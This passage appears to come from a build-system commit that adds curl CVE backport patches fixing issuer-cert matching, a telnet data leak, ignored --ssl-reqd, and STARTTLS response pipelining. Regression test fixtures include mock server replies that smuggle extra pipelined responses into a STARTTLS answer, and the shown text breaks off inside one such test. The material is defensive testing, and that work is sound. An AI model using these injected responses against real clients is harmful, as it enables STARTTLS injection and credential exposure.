+@@ -240,7 +241,6 @@ struct ssl_config_data {
+   struct ssl_primary_config primary;
+   long certverifyresult; /* result from the certificate verification */
+   char *CRLfile;   /* CRL to check certificate revocation */
+-  char *issuercert;/* optional issuer certificate filename */
+   curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
+   void *fsslctxp;        /* parameter for call back */
+   char *cert; /* client certificate file name */
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 46e149c7d..8c051024f 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -1059,7 +1059,7 @@ gtls_connect_step3(struct connectdata *conn,
+   if(!chainp) {
+     if(SSL_CONN_CONFIG(verifypeer) ||
+        SSL_CONN_CONFIG(verifyhost) ||
+-       SSL_SET_OPTION(issuercert)) {
++       SSL_CONN_CONFIG(issuercert)) {
+ #ifdef USE_TLS_SRP
+       if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP
+          && SSL_SET_OPTION(username) != NULL
+@@ -1241,21 +1241,21 @@ gtls_connect_step3(struct connectdata *conn,
+        gnutls_x509_crt_t format */
+     gnutls_x509_crt_import(x509_cert, chainp, GNUTLS_X509_FMT_DER);
+ 
+-  if(SSL_SET_OPTION(issuercert)) {
++  if(SSL_CONN_CONFIG(issuercert)) {
+     gnutls_x509_crt_init(&x509_issuer);
+-    issuerp = load_file(SSL_SET_OPTION(issuercert));
++    issuerp = load_file(SSL_CONN_CONFIG(issuercert));
+     gnutls_x509_crt_import(x509_issuer, &issuerp, GNUTLS_X509_FMT_PEM);
+     rc = gnutls_x509_crt_check_issuer(x509_cert, x509_issuer);
+     gnutls_x509_crt_deinit(x509_issuer);
+     unload_file(issuerp);
+     if(rc <= 0) {
+       failf(data, "server certificate issuer check failed (IssuerCert: %s)",
+-            SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
++            SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
+       gnutls_x509_crt_deinit(x509_cert);
+       return CURLE_SSL_ISSUER_ERROR;
+     }
+     infof(data, "\t server certificate issuer check OK (Issuer Cert: %s)\n",
+-          SSL_SET_OPTION(issuercert)?SSL_SET_OPTION(issuercert):"none");
++          SSL_CONN_CONFIG(issuercert)?SSL_CONN_CONFIG(issuercert):"none");
+   }
+ 
+   size = sizeof(certbuf);
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index ef51b0d91..375c78b1b 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -2151,9 +2151,9 @@ static CURLcode nss_do_connect(struct connectdata *conn, int sockindex)
+   if(result)
+     goto error;
+ 
+-  if(SSL_SET_OPTION(issuercert)) {
++  if(SSL_CONN_CONFIG(issuercert)) {
+     SECStatus ret = SECFailure;
+-    char *nickname = dup_nickname(data, SSL_SET_OPTION(issuercert));
++    char *nickname = dup_nickname(data, SSL_CONN_CONFIG(issuercert));
+     if(nickname) {
+       /* we support only nicknames in case of issuercert for now */
+       ret = check_issuer_cert(BACKEND->handle, nickname);
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 64f43605a..7e81fd3a0 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -3547,7 +3547,7 @@ static CURLcode servercert(struct connectdata *conn,
+        deallocating the certificate. */
+ 
+     /* e.g. match issuer name with provided issuer certificate */
+-    if(SSL_SET_OPTION(issuercert)) {
++    if(SSL_CONN_CONFIG(issuercert)) {
+       fp = BIO_new(BIO_s_file());
+       if(fp == NULL) {
+         failf(data,
+@@ -3560,10 +3560,10 @@ static CURLcode servercert(struct connectdata *conn,
+         return CURLE_OUT_OF_MEMORY;
+       }
+ 
+-      if(BIO_read_filename(fp, SSL_SET_OPTION(issuercert)) <= 0) {
++      if(BIO_read_filename(fp, SSL_CONN_CONFIG(issuercert)) <= 0) {
+         if(strict)
+           failf(data, "SSL: Unable to open issuer cert (%s)",
+-                SSL_SET_OPTION(issuercert));
++                SSL_CONN_CONFIG(issuercert));
+         BIO_free(fp);
+         X509_free(BACKEND->server_cert);
+         BACKEND->server_cert = NULL;
+@@ -3574,7 +3574,7 @@ static CURLcode servercert(struct connectdata *conn,
+       if(!issuer) {
+         if(strict)
+           failf(data, "SSL: Unable to read issuer cert (%s)",
+-                SSL_SET_OPTION(issuercert));
++                SSL_CONN_CONFIG(issuercert));
+         BIO_free(fp);
+         X509_free(issuer);
+         X509_free(BACKEND->server_cert);
+@@ -3585,7 +3585,7 @@ static CURLcode servercert(struct connectdata *conn,
+       if(X509_check_issued(issuer, BACKEND->server_cert) != X509_V_OK) {
+         if(strict)
+           failf(data, "SSL: Certificate issuer check failed (%s)",
+-                SSL_SET_OPTION(issuercert));
++                SSL_CONN_CONFIG(issuercert));
+         BIO_free(fp);
+         X509_free(issuer);
+         X509_free(BACKEND->server_cert);
+@@ -3594,7 +3594,7 @@ static CURLcode servercert(struct connectdata *conn,
+       }
+ 
+       infof(data, " SSL certificate issuer check ok (%s)\n",
+-            SSL_SET_OPTION(issuercert));
++            SSL_CONN_CONFIG(issuercert));
+       BIO_free(fp);
+       X509_free(issuer);
+     }
+diff --git a/lib/vtls/vtls.c b/lib/vtls/vtls.c
+index aaf73ef8f..8c681da14 100644
+--- a/lib/vtls/vtls.c
++++ b/lib/vtls/vtls.c
+@@ -82,6 +82,16 @@
+   else                                       \
+     dest->var = NULL;
+ 
++static bool safecmp(char *a, char *b)
++{
++  if(a && b)
++    return !strcmp(a, b);
++  else if(!a && !b)
++    return TRUE; /* match */
++  return FALSE; /* no match */
++}
++
++
+ bool
+ Curl_ssl_config_matches(struct ssl_primary_config* data,
+                         struct ssl_primary_config* needle)
+@@ -91,11 +101,12 @@ Curl_ssl_config_matches(struct ssl_primary_config* data,
+      (data->verifypeer == needle->verifypeer) &&
+      (data->verifyhost == needle->verifyhost) &&
+      (data->verifystatus == needle->verifystatus) &&
+-     Curl_safe_strcasecompare(data->CApath, needle->CApath) &&
+-     Curl_safe_strcasecompare(data->CAfile, needle->CAfile) &&
+-     Curl_safe_strcasecompare(data->clientcert, needle->clientcert) &&
+-     Curl_safe_strcasecompare(data->random_file, needle->random_file) &&
+-     Curl_safe_strcasecompare(data->egdsocket, needle->egdsocket) &&
++     safecmp(data->CApath, needle->CApath) &&
++     safecmp(data->CAfile, needle->CAfile) &&
++     safecmp(data->issuercert, needle->issuercert) &&
++     safecmp(data->clientcert, needle->clientcert) &&
++     safecmp(data->random_file, needle->random_file) &&
++     safecmp(data->egdsocket, needle->egdsocket) &&
+      Curl_safe_strcasecompare(data->cipher_list, needle->cipher_list) &&
+      Curl_safe_strcasecompare(data->cipher_list13, needle->cipher_list13) &&
+      Curl_safe_strcasecompare(data->pinned_key, needle->pinned_key))
+@@ -117,6 +128,7 @@ Curl_clone_primary_ssl_config(struct ssl_primary_config *source,
+ 
+   CLONE_STRING(CApath);
+   CLONE_STRING(CAfile);
++  CLONE_STRING(issuercert);
+   CLONE_STRING(clientcert);
+   CLONE_STRING(random_file);
+   CLONE_STRING(egdsocket);
+@@ -131,6 +143,7 @@ void Curl_free_primary_ssl_config(struct ssl_primary_config* sslc)
+ {
+   Curl_safefree(sslc->CApath);
+   Curl_safefree(sslc->CAfile);
++  Curl_safefree(sslc->issuercert);
+   Curl_safefree(sslc->clientcert);
+   Curl_safefree(sslc->random_file);
+   Curl_safefree(sslc->egdsocket);
+-- 
+2.30.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22925.patch b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
new file mode 100644
index 0000000000..13b55f76be
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22925.patch
@@ -0,0 +1,43 @@
+Subject: [PATCH] telnet: fix option parser to not send uninitialized
+ contents CVE-2021-22925
+
+Reported-by: Red Hat Product Security
+Bug: https://curl.se/docs/CVE-2021-22925.html
+CVE: CVE-2021-22925
+Upstream-Status: backport from Ubuntu curl_7.68.0-1ubuntu2.6
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/telnet.c | 17 +++++++++++------
+ 1 file changed, 11 insertions(+), 6 deletions(-)
+
+diff --git a/lib/telnet.c b/lib/telnet.c
+index 4bf4c652c..3347ad6d1 100644
+--- a/lib/telnet.c
++++ b/lib/telnet.c
+@@ -967,12 +967,17 @@ static void suboption(struct connectdata *conn)
+         size_t tmplen = (strlen(v->data) + 1);
+         /* Add the variable only if it fits */
+         if(len + tmplen < (int)sizeof(temp)-6) {
+-          if(sscanf(v->data, "%127[^,],%127s", varname, varval) == 2) {
+-            msnprintf((char *)&temp[len], sizeof(temp) - len,
+-                      "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
+-                      CURL_NEW_ENV_VALUE, varval);
+-            len += tmplen;
+-          }
++          int rv;
++          char sep[2] = "";
++          varval[0] = 0;
++          rv = sscanf(v->data, "%127[^,]%1[,]%127s", varname, sep, varval);
++          if(rv == 1)
++            len += msnprintf((char *)&temp[len], sizeof(temp) - len,
++                             "%c%s", CURL_NEW_ENV_VAR, varname);
++          else if(rv >= 2)
++            len += msnprintf((char *)&temp[len], sizeof(temp) - len,
++                             "%c%s%c%s", CURL_NEW_ENV_VAR, varname,
++                             CURL_NEW_ENV_VALUE, varval);
+         }
+       }
+       msnprintf((char *)&temp[len], sizeof(temp) - len,
+-- 
+2.30.2
+
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
new file mode 100644
index 0000000000..4afd755149
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch
@@ -0,0 +1,86 @@
+Backport of:
+
+From 1397a7de6e312e019a3b339f855ba0a5cafa9127 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 21 Sep 2020 09:15:51 +0200
+Subject: [PATCH] ftp: separate FTPS from FTP over "HTTPS proxy"
+
+When using HTTPS proxy, SSL is used but not in the view of the FTP
+protocol handler itself so separate the connection's use of SSL from the
+FTP control connection's sue.
+
+Reported-by: Mingtao Yang
+Fixes #5523
+Closes #6006
+
+Upstream-Status: backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+---
+ lib/ftp.c     | 13 ++++++-------
+ lib/urldata.h |  1 +
+ 2 files changed, 7 insertions(+), 7 deletions(-)
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 3382772..677527f 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2488,7 +2488,7 @@ static CURLcode ftp_state_loggedin(struct connectdata *conn)
+ {
+   CURLcode result = CURLE_OK;
+ 
+-  if(conn->ssl[FIRSTSOCKET].use) {
++  if(conn->bits.ftp_use_control_ssl) {
+     /* PBSZ = PROTECTION BUFFER SIZE.
+ 
+     The 'draft-murray-auth-ftp-ssl' (draft 12, page 7) says:
+@@ -2633,11 +2633,8 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+       }
+ #endif
+ 
+-      if(data->set.use_ssl &&
+-         (!conn->ssl[FIRSTSOCKET].use ||
+-          (conn->bits.proxy_ssl_connected[FIRSTSOCKET] &&
+-           !conn->proxy_ssl[FIRSTSOCKET].use))) {
+-        /* We don't have a SSL/TLS connection yet, but FTPS is
++      if(data->set.use_ssl && !conn->bits.ftp_use_control_ssl) {
++        /* We don't have a SSL/TLS control connection yet, but FTPS is
+            requested. Try a FTPS connection now */
+ 
+         ftpc->count3 = 0;
+@@ -2682,6 +2679,7 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+         result = Curl_ssl_connect(conn, FIRSTSOCKET);
+         if(!result) {
+           conn->bits.ftp_use_data_ssl = FALSE; /* clear-text data */
++          conn->bits.ftp_use_control_ssl = TRUE; /* SSL on control */
+           result = ftp_state_user(conn);
+         }
+       }
+@@ -3072,7 +3070,7 @@ static CURLcode ftp_block_statemach(struct connectdata *conn)
+  *
+  */
+ static CURLcode ftp_connect(struct connectdata *conn,
+-                                 bool *done) /* see description above */
++                            bool *done) /* see description above */
+ {
+   CURLcode result;
+   struct ftp_conn *ftpc = &conn->proto.ftpc;
+@@ -3093,6 +3091,7 @@ static CURLcode ftp_connect(struct connectdata *conn,
+     result = Curl_ssl_connect(conn, FIRSTSOCKET);
+     if(result)
+       return result;
++    conn->bits.ftp_use_control_ssl = TRUE;
+   }
+ 
+   Curl_pp_init(pp); /* init the generic pingpong data */
+diff --git a/lib/urldata.h b/lib/urldata.h
+index ff2d686..d1fb4a9 100644
+--- a/lib/urldata.h
++++ b/lib/urldata.h
+@@ -461,6 +461,7 @@ struct ConnectBits {
+                          EPRT doesn't work we disable it for the forthcoming
+                          requests */
+   BIT(ftp_use_data_ssl); /* Enabled SSL for the data connection */
++  BIT(ftp_use_control_ssl); /* Enabled SSL for the control connection */
+ #endif
+   BIT(netrc);         /* name+password provided by netrc */
+   BIT(userpwd_in_url); /* name+password found in url */
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22946.patch b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
new file mode 100644
index 0000000000..98032d8b78
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22946.patch
@@ -0,0 +1,328 @@
+Backport of:
+
+From 96d71feb27e533a8b337512841a537952916262c Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Wed, 8 Sep 2021 11:56:22 +0200
+Subject: [PATCH] ftp,imap,pop3: do not ignore --ssl-reqd
+
+In imap and pop3, check if TLS is required even when capabilities
+request has failed.
+
+In ftp, ignore preauthentication (230 status of server greeting) if TLS
+is required.
+
+Bug: https://curl.se/docs/CVE-2021-22946.html
+Upstream-Status: backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+CVE: CVE-2021-22946
+---
+ lib/ftp.c               |  9 ++++---
+ lib/imap.c              | 24 ++++++++----------
+ lib/pop3.c              | 33 +++++++++++-------------
+ tests/data/Makefile.inc |  2 ++
+ tests/data/test984      | 56 +++++++++++++++++++++++++++++++++++++++++
+ tests/data/test985      | 54 +++++++++++++++++++++++++++++++++++++++
+ tests/data/test986      | 53 ++++++++++++++++++++++++++++++++++++++
+ 7 files changed, 195 insertions(+), 36 deletions(-)
+ create mode 100644 tests/data/test984
+ create mode 100644 tests/data/test985
+ create mode 100644 tests/data/test986
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 677527f..91b43d8 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2606,9 +2606,12 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+     /* we have now received a full FTP server response */
+     switch(ftpc->state) {
+     case FTP_WAIT220:
+-      if(ftpcode == 230)
+-        /* 230 User logged in - already! */
+-        return ftp_state_user_resp(conn, ftpcode, ftpc->state);
++      if(ftpcode == 230) {
++        /* 230 User logged in - already! Take as 220 if TLS required. */
++        if(data->set.use_ssl <= CURLUSESSL_TRY ||
++           conn->bits.ftp_use_control_ssl)
++          return ftp_state_user_resp(conn, ftpcode, ftpc->state);
++      }
+       else if(ftpcode != 220) {
+         failf(data, "Got a %03d ftp-server response when 220 was expected",
+               ftpcode);
+diff --git a/lib/imap.c b/lib/imap.c
+index 66172bd..9880ce1 100644
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -917,22 +917,18 @@ static CURLcode imap_state_capability_resp(struct connectdata *conn,
+       line += wordlen;
+     }
+   }
+-  else if(imapcode == IMAP_RESP_OK) {
+-    if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
+-      /* We don't have a SSL/TLS connection yet, but SSL is requested */
+-      if(imapc->tls_supported)
+-        /* Switch to TLS connection now */
+-        result = imap_perform_starttls(conn);
+-      else if(data->set.use_ssl == CURLUSESSL_TRY)
+-        /* Fallback and carry on with authentication */
+-        result = imap_perform_authentication(conn);
+-      else {
+-        failf(data, "STARTTLS not supported.");
+-        result = CURLE_USE_SSL_FAILED;
+-      }
++  else if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
++    /* PREAUTH is not compatible with STARTTLS. */
++    if(imapcode == IMAP_RESP_OK && imapc->tls_supported && !imapc->preauth) {
++      /* Switch to TLS connection now */
++      result = imap_perform_starttls(conn);
+     }
+-    else
++    else if(data->set.use_ssl <= CURLUSESSL_TRY)
+       result = imap_perform_authentication(conn);
++    else {
++      failf(data, "STARTTLS not available.");
++      result = CURLE_USE_SSL_FAILED;
++    }
+   }
+   else
+     result = imap_perform_authentication(conn);
+diff --git a/lib/pop3.c b/lib/pop3.c
+index 57c1373..145b2b4 100644
+--- a/lib/pop3.c
++++ b/lib/pop3.c
+@@ -721,28 +721,23 @@ static CURLcode pop3_state_capa_resp(struct connectdata *conn, int pop3code,
+       }
+     }
+   }
+-  else if(pop3code == '+') {
+-    if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) {
+-      /* We don't have a SSL/TLS connection yet, but SSL is requested */
+-      if(pop3c->tls_supported)
+-        /* Switch to TLS connection now */
+-        result = pop3_perform_starttls(conn);
+-      else if(data->set.use_ssl == CURLUSESSL_TRY)
+-        /* Fallback and carry on with authentication */
+-        result = pop3_perform_authentication(conn);
+-      else {
+-        failf(data, "STLS not supported.");
+-        result = CURLE_USE_SSL_FAILED;
+-      }
+-    }
+-    else
+-      result = pop3_perform_authentication(conn);
+-  }
+   else {
+     /* Clear text is supported when CAPA isn't recognised */
+-    pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
++    if(pop3code != '+')
++      pop3c->authtypes |= POP3_TYPE_CLEARTEXT;
+ 
+-    result = pop3_perform_authentication(conn);
++    if(!data->set.use_ssl || conn->ssl[FIRSTSOCKET].use)
++      result = pop3_perform_authentication(conn);
++    else if(pop3code == '+' && pop3c->tls_supported)
++      /* Switch to TLS connection now */
++      result = pop3_perform_starttls(conn);
++    else if(data->set.use_ssl <= CURLUSESSL_TRY)
++      /* Fallback and carry on with authentication */
++      result = pop3_perform_authentication(conn);
++    else {
++      failf(data, "STLS not supported.");
++      result = CURLE_USE_SSL_FAILED;
++    }
+   }
+ 
+   return result;
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index f9535a6..0fa6799 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
+ test954 test955 test956 test957 test958 test959 test960 test961 test962 \
+ test963 test964 test965 test966 test967 test968 test969 \
+ \
++test984 test985 test986 \
++\
+ test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
+ test1008 test1009 test1010 test1011 test1012 test1013 test1014 test1015 \
+ test1016 test1017 test1018 test1019 test1020 test1021 test1022 test1023 \
+diff --git a/tests/data/test984 b/tests/data/test984
+new file mode 100644
+index 0000000..e573f23
+--- /dev/null
++++ b/tests/data/test984
+@@ -0,0 +1,56 @@
++<testcase>
++<info>
++<keywords>
++IMAP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY CAPABILITY A001 BAD Not implemented
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++imap
++</server>
++ <name>
++IMAP require STARTTLS with failing capabilities
++ </name>
++ <command>
++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl-reqd
++</command>
++<file name="log/upload%TESTNUMBER">
++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
++From: Fred Foobar <foobar@example.COM>
++Subject: afternoon meeting
++To: joe@example.com
++Message-Id: <B27397-0100000@example.COM>
++MIME-Version: 1.0
++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
++
++Hello Joe, do you think we can meet at 3:30 tomorrow?
++</file>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++A001 CAPABILITY
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test985 b/tests/data/test985
+new file mode 100644
+index 0000000..d0db4aa
+--- /dev/null
++++ b/tests/data/test985
+@@ -0,0 +1,54 @@
++<testcase>
++<info>
++<keywords>
++POP3
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY CAPA -ERR Not implemented
++</servercmd>
++<data nocheck="yes">
++From: me@somewhere
++To: fake@nowhere
++
++body
++
++--
++  yours sincerely
++</data>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++pop3
++</server>
++ <name>
++POP3 require STARTTLS with failing capabilities
++ </name>
++ <command>
++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl-reqd
++ </command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++CAPA
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test986 b/tests/data/test986
+new file mode 100644
+index 0000000..a709437
+--- /dev/null
++++ b/tests/data/test986
+@@ -0,0 +1,53 @@
++<testcase>
++<info>
++<keywords>
++FTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++REPLY welcome 230 Welcome
++REPLY AUTH 500 unknown command
++</servercmd>
++</reply>
++
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++ftp
++</server>
++ <name>
++FTP require STARTTLS while preauthenticated
++ </name>
++<file name="log/test%TESTNUMBER.txt">
++data
++    to
++      see
++that FTPS
++works
++  so does it?
++</file>
++ <command>
++--ssl-reqd --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret
++</command>
++</client>
++
++# Verify data after the test has been "shot"
++<verify>
++# 64 is CURLE_USE_SSL_FAILED
++<errorcode>
++64
++</errorcode>
++<protocol>
++AUTH SSL
++AUTH TLS
++</protocol>
++</verify>
++</testcase>
diff --git a/meta/recipes-support/curl/curl/CVE-2021-22947.patch b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
new file mode 100644
index 0000000000..070a328e27
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2021-22947.patch
@@ -0,0 +1,352 @@
+Backport of:
+
+From 259b4f2e1fd01fbc55e569ee0a507afeae34f77c Mon Sep 17 00:00:00 2001
+From: Patrick Monnerat <patrick@monnerat.net>
+Date: Tue, 7 Sep 2021 13:26:42 +0200
+Subject: [PATCH] ftp,imap,pop3,smtp: reject STARTTLS server response
+ pipelining
+
+If a server pipelines future responses within the STARTTLS response, the
+former are preserved in the pingpong cache across TLS negotiation and
+used as responses to the encrypted commands.
+
+This fix detects pipelined STARTTLS responses and rejects them with an
+error.
+
+Bug: https://curl.se/docs/CVE-2021-22947.html
+Upstream-Status: backport from 7.68.0-1ubuntu2.7
+Signed-off-by: Mike Crowe <mac@mcrowe.com>
+CVE: CVE-2021-22947
+
+---
+ lib/ftp.c               |  3 +++
+ lib/imap.c              |  4 +++
+ lib/pop3.c              |  4 +++
+ lib/smtp.c              |  4 +++
+ tests/data/Makefile.inc |  2 ++
+ tests/data/test980      | 52 ++++++++++++++++++++++++++++++++++++
+ tests/data/test981      | 59 +++++++++++++++++++++++++++++++++++++++++
+ tests/data/test982      | 57 +++++++++++++++++++++++++++++++++++++++
+ tests/data/test983      | 52 ++++++++++++++++++++++++++++++++++++
+ 9 files changed, 237 insertions(+)
+ create mode 100644 tests/data/test980
+ create mode 100644 tests/data/test981
+ create mode 100644 tests/data/test982
+ create mode 100644 tests/data/test983
+
+diff --git a/lib/ftp.c b/lib/ftp.c
+index 91b43d8..31a34e8 100644
+--- a/lib/ftp.c
++++ b/lib/ftp.c
+@@ -2670,6 +2670,9 @@ static CURLcode ftp_statemach_act(struct connectdata *conn)
+     case FTP_AUTH:
+       /* we have gotten the response to a previous AUTH command */
+ 
++      if(pp->cache_size)
++        return CURLE_WEIRD_SERVER_REPLY; /* Forbid pipelining in response. */
++
+       /* RFC2228 (page 5) says:
+        *
+        * If the server is willing to accept the named security mechanism,
+diff --git a/lib/imap.c b/lib/imap.c
+index 9880ce1..0ca700f 100644
+--- a/lib/imap.c
++++ b/lib/imap.c
+@@ -946,6 +946,10 @@ static CURLcode imap_state_starttls_resp(struct connectdata *conn,
+ 
+   (void)instate; /* no use for this yet */
+ 
++  /* Pipelining in response is forbidden. */
++  if(data->conn->proto.imapc.pp.cache_size)
++    return CURLE_WEIRD_SERVER_REPLY;
++
+   if(imapcode != IMAP_RESP_OK) {
+     if(data->set.use_ssl != CURLUSESSL_TRY) {
+       failf(data, "STARTTLS denied");
+diff --git a/lib/pop3.c b/lib/pop3.c
+index 145b2b4..8a2d52e 100644
+--- a/lib/pop3.c
++++ b/lib/pop3.c
+@@ -753,6 +753,10 @@ static CURLcode pop3_state_starttls_resp(struct connectdata *conn,
+ 
+   (void)instate; /* no use for this yet */
+ 
++  /* Pipelining in response is forbidden. */
++  if(data->conn->proto.pop3c.pp.cache_size)
++    return CURLE_WEIRD_SERVER_REPLY;
++
+   if(pop3code != '+') {
+     if(data->set.use_ssl != CURLUSESSL_TRY) {
+       failf(data, "STARTTLS denied");
+diff --git a/lib/smtp.c b/lib/smtp.c
+index e187287..66183e2 100644
+--- a/lib/smtp.c
++++ b/lib/smtp.c
+@@ -820,6 +820,10 @@ static CURLcode smtp_state_starttls_resp(struct connectdata *conn,
+ 
+   (void)instate; /* no use for this yet */
+ 
++  /* Pipelining in response is forbidden. */
++  if(data->conn->proto.smtpc.pp.cache_size)
++    return CURLE_WEIRD_SERVER_REPLY;
++
+   if(smtpcode != 220) {
+     if(data->set.use_ssl != CURLUSESSL_TRY) {
+       failf(data, "STARTTLS denied, code %d", smtpcode);
+diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc
+index 0fa6799..60e8176 100644
+--- a/tests/data/Makefile.inc
++++ b/tests/data/Makefile.inc
+@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \
+ test954 test955 test956 test957 test958 test959 test960 test961 test962 \
+ test963 test964 test965 test966 test967 test968 test969 \
+ \
++test980 test981 test982 test983 \
++\
+ test984 test985 test986 \
+ \
+ test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \
+diff --git a/tests/data/test980 b/tests/data/test980
+new file mode 100644
+index 0000000..97567f8
+--- /dev/null
++++ b/tests/data/test980
+@@ -0,0 +1,52 @@
++<testcase>
++<info>
++<keywords>
++SMTP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STARTTLS
++AUTH PLAIN
++REPLY STARTTLS 454 currently unavailable\r\n235 Authenticated\r\n250 2.1.0 Sender ok\r\n250 2.1.5 Recipient ok\r\n354 Enter mail\r\n250 2.0.0 Accepted
++REPLY AUTH 535 5.7.8 Authentication credentials invalid
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++smtp
++</server>
++ <name>
++SMTP STARTTLS pipelined server response
++ </name>
++<stdin>
++mail body
++</stdin>
++ <command>
++smtp://%HOSTIP:%SMTPPORT/%TESTNUMBER --mail-rcpt recipient@example.com --mail-from sender@example.com -u user:secret --ssl --sasl-ir -T -
++</command>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++EHLO %TESTNUMBER
++STARTTLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test981 b/tests/data/test981
+new file mode 100644
+index 0000000..2b98ce4
+--- /dev/null
++++ b/tests/data/test981
+@@ -0,0 +1,59 @@
++<testcase>
++<info>
++<keywords>
++IMAP
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STARTTLS
++REPLY STARTTLS A002 BAD currently unavailable\r\nA003 OK Authenticated\r\nA004 OK Accepted
++REPLY LOGIN A003 BAD Authentication credentials invalid
++</servercmd>
++</reply>
++
++#
++# Client-side
++<client>
++<features>
++SSL
++</features>
++<server>
++imap
++</server>
++ <name>
++IMAP STARTTLS pipelined server response
++ </name>
++ <command>
++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl
++</command>
++<file name="log/upload%TESTNUMBER">
++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST)
++From: Fred Foobar <foobar@example.COM>
++Subject: afternoon meeting
++To: joe@example.com
++Message-Id: <B27397-0100000@example.COM>
++MIME-Version: 1.0
++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
++
++Hello Joe, do you think we can meet at 3:30 tomorrow?
++</file>
++</client>
++
++#
++# Verify data after the test has been "shot"
++<verify>
++# 8 is CURLE_WEIRD_SERVER_REPLY
++<errorcode>
++8
++</errorcode>
++<protocol>
++A001 CAPABILITY
++A002 STARTTLS
++</protocol>
++</verify>
++</testcase>
+diff --git a/tests/data/test982 b/tests/data/test982
+new file mode 100644
+index 0000000..9e07cc0
+--- /dev/null
++++ b/tests/data/test982
+@@ -0,0 +1,57 @@
++<testcase>
++<info>
++<keywords>
++POP3
++STARTTLS
++</keywords>
++</info>
++
++#
++# Server-side
++<reply>
++<servercmd>
++CAPA STLS USER
++REPLY STLS -ERR currently unavailable\r\n+OK user accepted\r\n+OK authenticated
++REPLY PASS -ERR Authentication credentials invalid
++</servercmd>
++<data nocheck="yes">
++From: me@somewhere
++To: fake@nowhere
++
++body
++
